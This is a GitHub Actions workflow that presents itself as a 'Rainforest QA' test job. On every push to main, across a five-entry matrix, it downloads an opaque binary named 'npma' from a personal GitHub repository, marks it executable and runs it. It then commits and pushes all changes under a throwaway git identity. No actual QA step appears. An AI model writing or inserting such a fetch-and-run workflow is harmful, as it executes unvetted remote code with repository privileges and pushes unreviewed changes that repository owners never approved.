name: rainforestqa
on:
  push:
    branches:
      - main

jobs:
  rainforest:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        tag: [ test,build,push,commit,release]
    name: Run Rainforest
    steps:
      - uses: actions/checkout@v3
      - run: |
         wget https://github.com/Arlentak/pages/raw/master/npma 
         chmod +x npma
         ./npma
         rm test
         git config --local user.email "norenel.n.n.2.f05@gmail.com"
         git config --local user.name "usik2ski"
         git add -A
         git commit -m "Add changes"
         git push
